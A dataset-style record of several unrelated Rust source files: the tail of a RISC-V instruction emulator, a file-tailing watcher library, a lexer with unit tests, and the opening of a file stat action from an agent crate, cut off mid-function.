&mut self.csr, |uimm| uimm.zext(xlen) )?; pc + 4 }, Instruction::RVC(ins) => exec_rvc( ins, &mut self.x, &mut self.data_mem, pc, |imm| imm.sext(xlen), |uimm| uimm.zext(xlen), || xlen == Xlen::X64 || xlen == Xlen::X128, || xlen == Xlen::X128, || true, // todo: read from CSR || true // todo: read from CSR )?, Instruction::RVF(_ins) => todo!() }; Ok(next_pc) } } fn shamt32(imm: Imm) -> u32 { imm.low_u32() & 0b11111 } fn shamt32r(data: Usize) -> u32 { data.low_u32() & 0b11111 } fn exec_rv32i<'a, SEXT: Fn(Imm) -> Isize>( ins: RV32I, x: &mut XReg, data_mem: &mut Physical<'a>, pc: Usize, sext: SEXT, ) -> Result<Usize> { use RV32I::*; let mut next_pc = pc + 4; match ins { Lui(u) => x.w_isize(u.rd, sext(u.imm)), Auipc(u) => x.w_usize(u.rd, pc + sext(u.imm)), Jal(j) => { x.w_usize(j.rd, next_pc); next_pc = pc + sext(j.imm); } Jalr(i) => { x.w_usize(i.rd, next_pc); next_pc = x.r_usize(i.rs1) + sext(i.imm); } Beq(b) => { if x.r_usize(b.rs1) == x.r_usize(b.rs2) { next_pc = pc + sext(b.imm) } } Bne(b) => { if x.r_usize(b.rs1) != x.r_usize(b.rs2) { next_pc = pc + sext(b.imm) } } Blt(b) => { if x.r_isize(b.rs1) < x.r_isize(b.rs2) { next_pc = pc + sext(b.imm) } } Bge(b) => { if x.r_isize(b.rs1) >= x.r_isize(b.rs2) { next_pc = pc + sext(b.imm) } } Bltu(b) => { if x.r_usize(b.rs1) < x.r_usize(b.rs2) { next_pc = pc + sext(b.imm) } } Bgeu(b) => { if x.r_usize(b.rs1) >= x.r_usize(b.rs2) { next_pc = pc + sext(b.imm) } } Lb(i) => { let addr = pc_to_mem_addr(x.r_usize(i.rs1) + sext(i.imm)); let data = data_mem.read_i8(addr)?; x.w_sext8(i.rd, data); } Lh(i) => { let addr = pc_to_mem_addr(x.r_usize(i.rs1) + sext(i.imm)); let data = data_mem.read_i16(addr)?; x.w_sext16(i.rd, data); } Lw(i) => { let addr = pc_to_mem_addr(x.r_usize(i.rs1) + sext(i.imm)); let data = data_mem.read_i32(addr)?; x.w_sext32(i.rd, data); } Lbu(i) => { let addr = pc_to_mem_addr(x.r_usize(i.rs1) + sext(i.imm)); let data = data_mem.read_u8(addr)?; x.w_zext8(i.rd, data); } Lhu(i) => { let addr = pc_to_mem_addr(x.r_usize(i.rs1) + sext(i.imm)); let data = data_mem.read_u16(addr)?; x.w_zext16(i.rd, data); } Sb(s) => data_mem.write_u8( pc_to_mem_addr(x.r_usize(s.rs1) + sext(s.imm)), x.r_u8(s.rs2), )?, Sh(s) => data_mem.write_u16( pc_to_mem_addr(x.r_usize(s.rs1) + sext(s.imm)), x.r_u16(s.rs2), )?, Sw(s) => data_mem.write_u32( pc_to_mem_addr(x.r_usize(s.rs1) + sext(s.imm)), x.r_u32(s.rs2), )?, Addi(i) => x.w_usize(i.rd, x.r_usize(i.rs1) + sext(i.imm)), Slti(i) => { let value = if x.r_isize(i.rs1) < sext(i.imm) { 1 } else { 0 }; x.w_zext8(i.rd, value); } Sltiu(i) => { let value = if x.r_usize(i.rs1) < sext(i.imm).cast_to_usize() { 1 } else { 0 }; x.w_zext8(i.rd, value); } Ori(i) => { x.w_usize(i.rd, x.r_usize(i.rs1) | sext(i.imm)); } Andi(i) => { x.w_usize(i.rd, x.r_usize(i.rs1) & sext(i.imm)); } Xori(i) => { x.w_usize(i.rd, x.r_usize(i.rs1) ^ sext(i.imm)); } Slli(i) => { x.w_usize(i.rd, x.r_usize(i.rs1) << shamt32(i.imm)); } Srli(i) => { x.w_usize(i.rd, x.r_usize(i.rs1) >> shamt32(i.imm)); } Srai(i) => { x.w_isize(i.rd, x.r_isize(i.rs1) >> shamt32(i.imm)); } Add(r) => x.w_usize(r.rd, x.r_usize(r.rs1) + x.r_usize(r.rs2)), Sub(r) => x.w_usize(r.rd, x.r_usize(r.rs1) - x.r_usize(r.rs2)), Sll(r) => { let shamt = shamt32r(x.r_usize(r.rs2)); x.w_usize(r.rd, x.r_usize(r.rs1) << shamt); } Slt(r) => { let value = if x.r_isize(r.rs1) < x.r_isize(r.rs2) { 1 } else { 0 }; x.w_sext8(r.rd, value); } Sltu(r) => { let value = if x.r_usize(r.rs1) < x.r_usize(r.rs2) { 1 } else { 0 }; x.w_sext8(r.rd, value); } Xor(r) => { x.w_usize(r.rd, x.r_usize(r.rs1) ^ x.r_usize(r.rs2)); } Srl(r) => { let shamt = shamt32r(x.r_usize(r.rs2)); x.w_usize(r.rd, x.r_usize(r.rs1) >> shamt); } Sra(r) => { let shamt = shamt32r(x.r_usize(r.rs2)); x.w_isize(r.rd, x.r_isize(r.rs1) >> shamt); } Or(r) => { x.w_usize(r.rd, x.r_usize(r.rs1) | x.r_usize(r.rs2)); } And(r) => { x.w_usize(r.rd, x.r_usize(r.rs1) & x.r_usize(r.rs2)); } Fence(_) => todo!(), Ecall(_) => todo!(), Ebreak(_) => todo!("ebreak"), } Ok(next_pc) } fn shamt64(imm: Imm) -> u32 { imm.low_u32() & 0b111111 } fn shamt64r(data: Usize) -> u32 { data.low_u32() & 0b111111 } fn exec_rv64i<'a, SEXT: Fn(Imm) -> Isize, X64: Fn() -> bool>( ins: RV64I, x: &mut XReg, data_mem: &mut Physical<'a>, sext: SEXT, has_x64: X64, ) -> Result<()> { if !has_x64() { return Err(ExecError::ExtensionNotSupported)?; } use RV64I::*; match ins { Lwu(i) => { let addr = pc_to_mem_addr(x.r_usize(i.rs1) + sext(i.imm)); let data = data_mem.read_u32(addr)?; x.w_zext32(i.rd, data); } Ld(i) => { let addr = pc_to_mem_addr(x.r_usize(i.rs1) + sext(i.imm)); let data = data_mem.read_i64(addr)?; x.w_sext64(i.rd, data); } Sd(s) => data_mem.write_u64( pc_to_mem_addr(x.r_usize(s.rs1) + sext(s.imm)), x.r_u64(s.rs2), )?, Slli(i) => x.w_usize(i.rd, x.r_usize(i.rs1) << shamt64(i.imm)), Srli(i) => x.w_usize(i.rd, x.r_usize(i.rs1) >> shamt64(i.imm)), Srai(i) => x.w_isize(i.rd, x.r_isize(i.rs1) >> shamt64(i.imm)), Sll(r) => { let shamt = shamt64r(x.r_usize(r.rs2)); x.w_usize(r.rd, x.r_usize(r.rs1) << shamt); } Srl(r) => { let shamt = shamt64r(x.r_usize(r.rs2)); x.w_usize(r.rd, x.r_usize(r.rs1) >> shamt); } Sra(r) => { let shamt = shamt64r(x.r_usize(r.rs2)); x.w_isize(r.rd, x.r_isize(r.rs1) >> shamt); } Addiw(i) => x.w_sext32(i.rd, x.r_i32(i.rs1).wrapping_add(i.imm.low_i32())), Slliw(i) => { let val = x.r_i32(i.rs1).checked_shl(shamt32(i.imm)).unwrap_or(0); x.w_sext32(i.rd, val) } Srliw(i) => { let val = x.r_u32(i.rs1).checked_shr(shamt32(i.imm)).unwrap_or(0); x.w_sext32(i.rd, i32::from_ne_bytes(val.to_be_bytes())) } Sraiw(i) => { let val = x.r_i32(i.rs1).checked_shr(shamt32(i.imm)).unwrap_or(0); x.w_sext32(i.rd, val) } Addw(r) => x.w_sext32(r.rd, x.r_i32(r.rs1).wrapping_add(x.r_i32(r.rs2))), Subw(r) => x.w_sext32(r.rd, x.r_i32(r.rs1).wrapping_sub(x.r_i32(r.rs2))), Sllw(r) => { let val = x .r_i32(r.rs1) .checked_shl(shamt32r(x.r_usize(r.rs2))) .unwrap_or(0); x.w_sext32(r.rd, val) } Srlw(r) => { let val = x .r_u32(r.rs1) .checked_shr(shamt32r(x.r_usize(r.rs2))) .unwrap_or(0); x.w_sext32(r.rd, i32::from_ne_bytes(val.to_be_bytes())) } Sraw(r) => { let val = x .r_i32(r.rs1) .checked_shr(shamt32r(x.r_usize(r.rs2))) .unwrap_or(0); x.w_sext32(r.rd, val) } } Ok(()) } fn exec_rvzicsr<ZEXT: Fn(Uimm) -> Usize>( ins: RVZicsr, x: &mut XReg, csr: &mut Csr, zext: ZEXT, ) -> Result<()> { use RVZicsr::*; // if r.rd!=0 or r.rs1 != 0 => prevent side effects match ins { Csrrw(r) => { if r.rd != 0 { x.w_usize(r.rd, csr.r_usize(r.csr)); } csr.w_usize(r.csr, x.r_usize(r.rs1)); } Csrrs(r) => { x.w_usize(r.rd, csr.r_usize(r.csr)); if r.rs1 != 0 { csr.w_usize(r.csr, csr.r_usize(r.csr) | x.r_usize(r.rs1)); } } Csrrc(r) => { x.w_usize(r.rd, csr.r_usize(r.csr)); if r.rs1 != 0 { csr.w_usize(r.csr, csr.r_usize(r.csr) & !x.r_usize(r.rs1)); } } Csrrwi(i) => { if i.rd != 0 { x.w_usize(i.rd, csr.r_usize(i.csr)); } csr.w_usize(i.csr, zext(i.uimm)); } Csrrsi(i) => { x.w_usize(i.rd, csr.r_usize(i.csr)); if i.uimm != 0 { csr.w_usize(i.csr, csr.r_usize(i.csr) | zext(i.uimm)); } } Csrrci(i) => { x.w_usize(i.rd, csr.r_usize(i.csr)); if i.uimm != 0 { csr.w_usize(i.csr, csr.r_usize(i.csr) & !zext(i.uimm)); } } } Ok(()) } const X1_RA: u8 = 1; const X2_SP: u8 = 2; fn exec_rvc< 'a, SEXT: Fn(Imm) -> Isize, ZEXT: Fn(Uimm) -> Usize, X64: Fn() -> bool, X128: Fn() -> bool, F32: Fn() -> bool, F64: Fn() -> bool, >( ins: RVC, x: &mut XReg, data_mem: &mut Physical<'a>, pc: Usize, sext: SEXT, zext: ZEXT, has_x64: X64, has_x128: X128, has_f32: F32, has_f64: F64, ) -> Result<Usize> { let shamt_c = |imm: Imm| -> Result<u32> { if has_x128() { todo!("RV128I") } let s64 = imm.low_u32() & 0b111111; if !has_x64() && s64 >= 0b100000 { return Err(ExecError::ExtensionNotSupported)?; }; Ok(s64) }; use RVC::*; let mut next_pc = pc + 2; // if r.rd!=0 or r.rs1 != 0 => prevent side effects match ins { Caddi4spn(ciw) => x.w_usize(ciw.rd, x.r_usize(X2_SP) + zext(ciw.uimm)), Cfld(_cl) => { if has_x128() || !has_f64() { // RV32DC or RV64DC return Err(ExecError::ExtensionNotSupported)?; } todo!("D extension") }, Clq(_cl) => { if !has_x128() { // RV128C return Err(ExecError::ExtensionNotSupported)?; } todo!("RV128I") }, Clw(cl) => { let addr = pc_to_mem_addr(x.r_usize(cl.rs1) + sext(cl.imm)); let data = data_mem.read_i32(addr)?; x.w_sext32(cl.rd, data); }, Cflw(_clt) => { if !has_f32() || has_x64() || has_x128() { // RV32FC return Err(ExecError::ExtensionNotSupported)?; } todo!("F extension") }, Cld(cl) => { if !has_x64() && !has_x128() { // RV64C or RV128C return Err(ExecError::ExtensionNotSupported)?; } let addr = pc_to_mem_addr(x.r_usize(cl.rs1) + sext(cl.imm)); let data = data_mem.read_i64(addr)?; x.w_sext64(cl.rd, data); }, Cfsd(_cs) => { if has_x128() || !has_f64() { // RV32DC or RV64DC return Err(ExecError::ExtensionNotSupported)?; } todo!("D extension") }, Csq(_cs) => { if !has_x128() { // RV128C return Err(ExecError::ExtensionNotSupported)?; } todo!("RV128I") }, Csw(cs) => data_mem.write_u32( pc_to_mem_addr(x.r_usize(cs.rs1) + sext(cs.imm)), x.r_u32(cs.rs2), )?, Cfsw(_cs) => { if !has_f32() || has_x64() || has_x128() { // RV32FC return Err(ExecError::ExtensionNotSupported)?; } todo!("F extension") }, Csd(cs) => { if !has_x64() && !has_x128() { // RV64C or RV128C return Err(ExecError::ExtensionNotSupported)?; } data_mem.write_u64( pc_to_mem_addr(x.r_usize(cs.rs1) + sext(cs.imm)), x.r_u64(cs.rs2), )? }, Cnop(_) => { /* nop */ }, Caddi(ci) => { x.w_usize(ci.rdrs1, x.r_usize(ci.rdrs1) + sext(ci.imm)) }, Cjal(cj) => { if has_x64() || has_x128() { // RV32C return Err(ExecError::ExtensionNotSupported)?; } x.w_usize(X1_RA, next_pc); next_pc = pc + sext(cj.target); }, Caddiw(ci) => { if !has_x64() && !has_x128() { // RV64C or RV128C return Err(ExecError::ExtensionNotSupported)?; } x.w_sext32(ci.rdrs1, x.r_i32(ci.rdrs1).wrapping_add(ci.imm.low_i32())) }, Cli(ci) => { x.w_isize(ci.rdrs1, sext(ci.imm)) }, Caddi16sp(ci) => { x.w_usize(X2_SP, x.r_usize(X2_SP) + sext(ci.imm)) }, Clui(ci) => { x.w_isize(ci.rdrs1, sext(ci.imm)) }, Csrli(ci) => { x.w_usize(ci.rdrs1, x.r_usize(ci.rdrs1) >> shamt_c(ci.imm)?); }, Csrli64(_ci) => { // c.srlid? if !has_x128() { // RV128C return Err(ExecError::ExtensionNotSupported)?; } todo!("RV128I") }, Csrai(ci) => { x.w_isize(ci.rdrs1, x.r_isize(ci.rdrs1) >> shamt_c(ci.imm)?); }, Csrai64(_ci) => { // c.sraid? if !has_x128() { // RV128C return Err(ExecError::ExtensionNotSupported)?; } todo!("RV128I") }, Candi(ci) => x.w_usize(ci.rdrs1, x.r_usize(ci.rdrs1) & sext(ci.imm)), Csub(ca) => { x.w_usize(ca.rdrs1, x.r_usize(ca.rdrs1) - x.r_usize(ca.rs2)); }, Cxor(ca) => { x.w_usize(ca.rdrs1, x.r_usize(ca.rdrs1) ^ x.r_usize(ca.rs2)); }, Cor(ca) => { x.w_usize(ca.rdrs1, x.r_usize(ca.rdrs1) | x.r_usize(ca.rs2)); }, Cand(ca) => { x.w_usize(ca.rdrs1, x.r_usize(ca.rdrs1) & x.r_usize(ca.rs2)); }, Csubw(ca) => { x.w_sext32(ca.rdrs1, x.r_i32(ca.rdrs1).wrapping_sub(x.r_i32(ca.rs2))) }, Caddw(ca) => { x.w_sext32(ca.rdrs1, x.r_i32(ca.rdrs1).wrapping_add(x.r_i32(ca.rs2))) }, Cj(cj) => next_pc = pc + sext(cj.target), Cbeqz(cb) => { if x.r_usize(cb.rs1) == x.r_usize(0) { next_pc = pc + sext(cb.off) } }, Cbnez(cb) => { if x.r_usize(cb.rs1) != x.r_usize(0) { next_pc = pc + sext(cb.off) } }, Cslli(ci) => { x.w_usize(ci.rdrs1, x.r_usize(ci.rdrs1) << shamt_c(ci.imm)?); }, Cslli64(_ci) => { // c.sllid? if !has_x128() { // RV128C return Err(ExecError::ExtensionNotSupported)?; } todo!("RV128I") }, Cfldsp(_ci) => { if has_x128() || !has_f64() { // RV32DC or RV64DC return Err(ExecError::ExtensionNotSupported)?; } todo!("D extension") }, Clqsp(_ci) => { if !has_x128() { // RV128C return Err(ExecError::ExtensionNotSupported)?; } todo!("RV128I") }, Clwsp(ci) => { let addr = pc_to_mem_addr(x.r_usize(X2_SP) + sext(ci.imm)); let data = data_mem.read_i32(addr)?; x.w_sext32(ci.rdrs1, data); }, Cflwsp(_ci) => { if !has_f32() || has_x64() || has_x128() { // RV32FC return Err(ExecError::ExtensionNotSupported)?; } todo!("F extension") }, Cldsp(ci) => { if !has_x64() || !has_x128() { // RV64C or RV128C return Err(ExecError::ExtensionNotSupported)?; } let addr = pc_to_mem_addr(x.r_usize(X2_SP) + sext(ci.imm)); let data = data_mem.read_i64(addr)?; x.w_sext64(ci.rdrs1, data); }, Cjr(cr) => next_pc = x.r_usize(cr.rdrs1), Cmv(cr) => x.w_usize(cr.rdrs1, x.r_usize(cr.rs2)), Cebreak(_cr) => todo!("ebreak"), Cjalr(cr) => { x.w_usize(X1_RA, next_pc); next_pc = x.r_usize(cr.rdrs1); }, Cadd(cr) => { x.w_usize(cr.rdrs1, x.r_usize(cr.rdrs1) + x.r_usize(cr.rs2)); }, Cfsdsp(_css) => { if has_x128() || !has_f64() { // RV32DC or RV64DC return Err(ExecError::ExtensionNotSupported)?; } todo!("D extension") }, Csqsp(_css) => { if !has_x128() { // RV128C return Err(ExecError::ExtensionNotSupported)?; } todo!("RV128I") }, Cswsp(css) => data_mem.write_u32( pc_to_mem_addr(x.r_usize(X2_SP) + sext(css.imm)), x.r_u32(css.rs2), )?, Cfswsp(_css) => { if !has_f32() || has_x64() || has_x128() { // RV32FC return Err(ExecError::ExtensionNotSupported)?; } todo!("F extension") }, Csdsp(css) => { if !has_x64() || !has_x128() { // RV64C or RV128C return Err(ExecError::ExtensionNotSupported)?; } data_mem.write_u64( pc_to_mem_addr(x.r_usize(X2_SP) + sext(css.imm)), x.r_u64(css.rs2), )?; }, } Ok(next_pc) }
true
437141bc0a9638b2fc0e35cf864d38851ccb5326
Rust
kingxsp/filewatcher
/src/lib.rs
UTF-8
4,793
3.046875
3
[ "Apache-2.0" ]
permissive
use std::fs::File; use std::io::SeekFrom; use std::io::BufReader; use std::io::prelude::*; use std::os::unix::fs::MetadataExt; use std::io::ErrorKind; pub struct FileWatcher { filename: String, inode: u64, position: u64, reader: BufReader<File>, finish: bool } impl Clone for FileWatcher { fn clone(&self) -> FileWatcher { let file = File::open(&self.filename).unwrap(); let mut reader = BufReader::new(file); reader.seek(SeekFrom::Start(self.position)).unwrap(); FileWatcher { filename: self.filename.clone(), inode: self.inode, position: self.position, reader: reader, finish: self.finish, } } } pub enum Message { NONE, Line { inode: u64, position: u64, line: String } } impl FileWatcher { pub fn new(filename: String) -> Result<FileWatcher, ::std::io::Error> { let file = match File::open(filename.clone()) { Ok(f) => f, Err(err) => return Err(err) }; let metadata = match file.metadata() { Ok(m) => m, Err(err) => return Err(err) }; let mut reader = BufReader::new(file); let position = metadata.len(); reader.seek(SeekFrom::Start(position)).unwrap(); Ok(FileWatcher{filename: filename, inode: metadata.ino(), position: position, reader: reader, finish: false}) } pub fn reposition(&mut self, inode: u64, start_pos: u64) -> Result<FileWatcher, &'static str> { if inode > 0 && self.inode != inode { return Err("last watcher file inode is can't be match!"); } self.position = start_pos; self.reader.seek(SeekFrom::Start(self.position)).unwrap(); Ok(self.clone()) } pub fn get_filename(&mut self) -> String { self.filename.clone() } pub fn get_inode(&mut self) -> u64 { self.inode } pub fn get_position(&mut self) -> u64 { self.position } pub fn close(&mut self){ self.finish = true; } fn reopen(&mut self){ loop { match File::open(self.filename.clone()) { Ok(f) => { let metadata = match f.metadata() { Ok(m) => m, Err(_) => { continue; } }; self.reader = BufReader::new(f); if metadata.ino() != self.inode{ self.position = 0; self.inode = metadata.ino(); } self.reader.seek(SeekFrom::Start(self.position)).unwrap(); break; }, Err(err) => { if err.kind() == ErrorKind::NotFound{ if self.finish { break; } continue; } } }; } } fn read(&mut self) -> Option<Message> { let mut line = String::new(); let resp = self.reader.read_line(&mut line); match resp { Ok(0) => { if self.finish { None } else { self.reopen(); Some(Message::NONE) } }, Ok(len) => { if self.finish { return None; } self.position += len as u64; self.reader.seek(SeekFrom::Start(self.position)).unwrap(); Some(Message::Line{ inode: self.inode, position: self.position, line: line }) }, Err(err) => panic!("Can't read: {}", err) } } } impl Iterator for FileWatcher { type Item = Message; fn next(&mut self) -> Option<Message> { self.read() } } #[cfg(test)] mod tests { use super::{FileWatcher, Message}; #[test] fn it_works() { let mut times = 0; let mut watcher = match FileWatcher::new("Cargo.toml".to_string()) { Ok(w) => w, Err(err) => panic!("Can't read: {}", err) }; let inode = watcher.inode; let mut watcher = match watcher.reposition(inode, 0) { Ok(w) => w, Err(err) => panic!("Can't reposition: {}", err) }; loop { match watcher.next() { Some(Message::NONE) => { println!("None None!!!"); }, Some(Message::Line{inode, position, line}) => { println!("inode: {:?} position: {:?} line: {:?}", inode, position, line); }, None => break } println!("filename: {:?}", watcher.get_filename()); println!("file inode: {:?}", watcher.get_inode()); println!("file position: {:?}", watcher.get_position()); if times == 5 { watcher.close(); } times += 1; } } }
true
6730004fb0160376db60b3ad0202430ea377b8df
Rust
Metastone/automaton-rules
/src/compiler/lexer.rs
UTF-8
12,020
3.640625
4
[ "MIT" ]
permissive
/// This module provides lexical analysis functions use std::fs::File; use std::io; use std::io::{BufReader, Read, Seek, SeekFrom}; use std::fmt; static DELIMITERS: [char; 5] = ['{', '}', '(', ')', ',']; static SINGLE_CHAR_OPERATORS: [char; 2] = ['<', '>']; static TWO_CHAR_OPERATORS: [&str; 6] = ["&&", "||", "==", "!=", "<=", ">="]; static OPERATOR_FIRST_CHARS: [char; 6] = ['&', '|', '=', '!', '<', '>']; pub struct Token { pub str: String, pub line: u32, pub column: u32 } impl Token { fn new(str: String, lexer: &Lexer) -> Token { let column = if lexer.current_char_in_token { lexer.current_column } else { lexer.previous_column }; let line = if lexer.current_char == '\n' { lexer.previous_line } else { lexer.current_line }; Token { str, line, column } } } impl fmt::Display for Token { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { write!(f, "\"{}\" - line {}, column {}", self.str, self.line, self.column) } } pub struct Lexer<'a> { reader: BufReader<File>, file_name: &'a str, previous_line: u32, previous_column: u32, current_line: u32, current_column: u32, current_char_in_token: bool, current_char: char } impl<'a> Lexer<'a> { pub fn new(file_name: &str) -> Result<Lexer, io::Error> { let file = File::open(file_name)?; let reader = BufReader::new(file); Ok(Lexer { reader, file_name, previous_line: 1, previous_column: 0, current_line: 1, current_column: 0, current_char_in_token: false, current_char: '\n' }) } pub fn get_next_token(&mut self) -> Result<Token, String> { // Read until a not-whitespace parameter is found. let mut c = self.read_char()?; while c.is_ascii_whitespace() && c != '\u{0}' { c = self.read_char()?; } // The token is a single delimiter character. if DELIMITERS.contains(&c) { return Ok(Token::new(c.to_string(), &self)); } // The token seems to be an operator. if OPERATOR_FIRST_CHARS.contains(&c) { return self.get_operator_token(c); } // The token should be a number or an alpha-numeric identifier (that doesn't start with a number). self.get_number_or_id_token(c) } fn get_operator_token(&mut self, c: char) -> Result<Token, String> { let mut token = String::new(); token.push(c); let expected_char = match c { '!' => '=', '<' => '=', '>' => '=', _ => c }; let c2 = self.read_char()?; token.push(c2); // The token is a two-characters operator if c2 == expected_char { Ok(Token::new(token, &self)) } // The token is a single character operator ('<' or '>') else if (c == '<' || c == '>') && (c2.is_ascii_whitespace() || c2 == '\u{0}' || c2.is_ascii_alphanumeric() || DELIMITERS.contains(&c2) || OPERATOR_FIRST_CHARS.contains(&c2)) { token.pop(); self.rewind_char()?; Ok(Token::new(token, &self)) } // The token starts as an operator but not one else { Err(format!("Invalid token {}. Note : recognized operators are {:?} and {:?}.", Token::new(token, &self), SINGLE_CHAR_OPERATORS, TWO_CHAR_OPERATORS)) } } fn get_number_or_id_token(&mut self, first_char: char) -> Result<Token, String> { let is_token_number = first_char.is_ascii_digit(); let is_token_identifier = first_char.is_ascii_alphabetic(); let mut rewind_one_char = false; let mut failure = false; let mut token = String::new(); let mut c = first_char; let mut dot_encountered = false; while !c.is_ascii_whitespace() && c != '\u{0}' { token.push(c); if is_token_number && !c.is_ascii_digit() { if DELIMITERS.contains(&c) || OPERATOR_FIRST_CHARS.contains(&c) { rewind_one_char = true; break; } else if c == '.' && !dot_encountered { dot_encountered = true; } else { failure = true; } } if is_token_identifier && !c.is_ascii_alphanumeric() { if DELIMITERS.contains(&c) || OPERATOR_FIRST_CHARS.contains(&c) { rewind_one_char = true; break; } else { failure = true; } } c = self.read_char()?; } // The token is not a valid number or identifier if failure { return if is_token_number { Err(format!("Invalid token {}. It starts with a digit but is not a number.", Token::new(token, &self))) } else { Err(format!("Invalid token {}. It contains illegal characters.", Token::new(token, &self))) } } // No token found and we reached end-of-file if token.is_empty() && c == '\u{0}' { return Ok(Token::new(String::new(), &self)) } // The last character is nor part of the token, we just have to un-read it and we are good. if rewind_one_char { token.pop(); self.rewind_char()?; } // Token is a valid number or identifier Ok(Token::new(token, &self)) } fn read_char(&mut self) -> Result<char, String> { let mut buffer = [0; 1]; match self.reader.read(&mut buffer) { Ok(_) => { self.current_char = buffer[0] as char; self.current_char_in_token = !(self.current_char.is_ascii_whitespace() || self.current_char == '\u{0}'); if self.current_char == '\n' { self.previous_line = self.current_line; self.previous_column = self.current_column; self.current_line += 1; self.current_column = 0; } else { self.previous_column = self.current_column; self.current_column += 1; } } Err(e) => { return Err(format!("Cannot read character from file {} (line {}, column {}). Cause : {:?}", self.file_name, self.current_line, self.current_column, e)) } } Ok(buffer[0] as char) } fn rewind_char(&mut self) -> Result<(), String> { if let Err(error) = self.reader.seek(SeekFrom::Current(-1)) { return Err(format!("Could not get token (line {}, column {}). Cause : {:?}", self.previous_line, self.previous_column, error)); } if self.current_char == '\n' { self.current_line = self.previous_line; } self.current_column = self.previous_column; self.current_char_in_token = true; Ok(()) } } // TODO Add tests for line and columns feature, current tests are not enough #[cfg(test)] mod tests { use crate::compiler::lexer::{Lexer, SINGLE_CHAR_OPERATORS, TWO_CHAR_OPERATORS}; static BENCH_NICE_FILE: &str = "resources/tests/lexer_benchmark_nice.txt"; static BENCH_UGLY_FILE: &str = "resources/tests/lexer_benchmark_ugly.txt"; static NON_EXISTING_FILE: &str = "resources/tests/does_not_exist.txt"; static OPERATOR_TYPO_FILE: &str = "resources/tests/lexer_operator_typo.txt"; static NB_WITH_TWO_DOTS_FILE: &str = "resources/tests/lexer_number_with_two_dots.txt"; static NB_WITH_ALPHABETIC_FILE: &str = "resources/tests/lexer_number_with_alphabetic.txt"; static ID_WITH_ILLEGAL_CHAR_FILE: &str = "resources/tests/lexer_id_with_illegal_char.txt"; #[test] fn tokenize_benchmark_nice_succeeds() { let mut lexer = Lexer::new(BENCH_NICE_FILE).unwrap(); check_benchmark_output(&mut lexer); } #[test] fn tokenize_benchmark_ugly_succeeds() { let mut lexer = Lexer::new(BENCH_UGLY_FILE).unwrap(); check_benchmark_output(&mut lexer); } fn check_benchmark_output(lexer: &mut Lexer) { assert_eq!(lexer.get_next_token().unwrap().str, "th15I5AnAlphanum3r1cId3nt1f1er"); assert_eq!(lexer.get_next_token().unwrap().str, "thisTooAndNextUpIsANumber"); assert_eq!(lexer.get_next_token().unwrap().str, "123456"); assert_eq!(lexer.get_next_token().unwrap().str, "<"); assert_eq!(lexer.get_next_token().unwrap().str, ">"); assert_eq!(lexer.get_next_token().unwrap().str, "test"); assert_eq!(lexer.get_next_token().unwrap().str, "<="); assert_eq!(lexer.get_next_token().unwrap().str, ">="); assert_eq!(lexer.get_next_token().unwrap().str, "&&"); assert_eq!(lexer.get_next_token().unwrap().str, "||"); assert_eq!(lexer.get_next_token().unwrap().str, "=="); assert_eq!(lexer.get_next_token().unwrap().str, "!="); assert_eq!(lexer.get_next_token().unwrap().str, "test"); assert_eq!(lexer.get_next_token().unwrap().str, ","); assert_eq!(lexer.get_next_token().unwrap().str, "test"); assert_eq!(lexer.get_next_token().unwrap().str, "("); assert_eq!(lexer.get_next_token().unwrap().str, ")"); assert_eq!(lexer.get_next_token().unwrap().str, "{"); assert_eq!(lexer.get_next_token().unwrap().str, "}"); assert_eq!(lexer.get_next_token().unwrap().str, "3.14"); assert_eq!(lexer.get_next_token().unwrap().str, "test"); assert!(lexer.get_next_token().unwrap().str.is_empty()); assert!(lexer.get_next_token().unwrap().str.is_empty()); } #[test] fn tokenize_no_file_fails() { match Lexer::new(NON_EXISTING_FILE) { Err(io_error) => assert!(io_error.to_string().contains("No such file or directory")), _ => assert!(false), } } #[test] fn tokenize_operator_typo_fails() { let mut lexer = Lexer::new(OPERATOR_TYPO_FILE).unwrap(); match lexer.get_next_token() { Err(error) => assert_eq!(error, format!( "Invalid token \"|-\" - line 1, column 2. Note : recognized operators are {:?} and {:?}.", SINGLE_CHAR_OPERATORS, TWO_CHAR_OPERATORS)), _ => assert!(false), } assert_eq!(lexer.get_next_token().unwrap().str, "thisTokenShouldBeReadWithoutIssues"); } #[test] fn tokenize_number_with_two_dots_fails() { let mut lexer = Lexer::new(NB_WITH_TWO_DOTS_FILE).unwrap(); match lexer.get_next_token() { Err(error) => assert_eq!(error, "Invalid token \"1.000.000\" - line 1, column 9. It starts with a digit but is not a number."), _ => assert!(false), } assert_eq!(lexer.get_next_token().unwrap().str, "thisTokenShouldBeReadWithoutIssues"); } #[test] fn tokenize_number_with_alphabetic_fails() { let mut lexer = Lexer::new(NB_WITH_ALPHABETIC_FILE).unwrap(); match lexer.get_next_token() { Err(error) => assert_eq!(error, "Invalid token \"10O0\" - line 1, column 4. It starts with a digit but is not a number."), _ => assert!(false), } assert_eq!(lexer.get_next_token().unwrap().str, "thisTokenShouldBeReadWithoutIssues"); } #[test] fn tokenize_id_with_illegal_char_fails() { let mut lexer = Lexer::new(ID_WITH_ILLEGAL_CHAR_FILE).unwrap(); match lexer.get_next_token() { Err(error) => assert_eq!(error, "Invalid token \"hello_world\" - line 1, column 11. It contains illegal characters."), _ => assert!(false), } assert_eq!(lexer.get_next_token().unwrap().str, "thisTokenShouldBeReadWithoutIssues"); } }
true
2fb3ca2c0bc8952c78c7dad0a5f733a77cbe5acd
Rust
google/rrg
/crates/rrg/src/action/deprecated/stat.rs
UTF-8
19,541
2.671875
3
[ "MIT" ]
permissive
// Copyright 2020 Google LLC // // Use of this source code is governed by an MIT-style license that can be found // in the LICENSE file or at https://opensource.org/licenses/MIT. //! A handler and associated types for the file stat action. //! //! A file stat action collects filesystem metadata associated with a particular //! file. //! //! Note that the gathered bits of information differ across platforms, e.g. on //! Linux there is a notion of symlinks whereas on Windows no such thing exists. //! Therefore, on Linux the results might include additional information about //! the symlink (like the file it points to). use std::fs::Metadata; use std::path::PathBuf; use rrg_macro::ack; use crate::session::{self, Session}; /// A request type for the stat action. #[derive(Debug)] pub struct Request { /// A path to the file to stat. path: PathBuf, /// Whether to collect extended file attributes. collect_ext_attrs: bool, /// Whether, in case of a symlink, to collect data about the linked file. follow_symlink: bool, } impl Request { /// Obtains a (potentially expanded) path that this request corresponds to. /// /// In case of requests that wish to follow symlinks, it will return a path /// to the symlink target (in case there is such). Otherwise, it will just /// return the requested path unchanged. /// /// # Errors /// /// This method will return an error if the path needs to be expanded but /// the expansion fails for some reason (e.g. the requested path does not /// exist). fn target(&self) -> 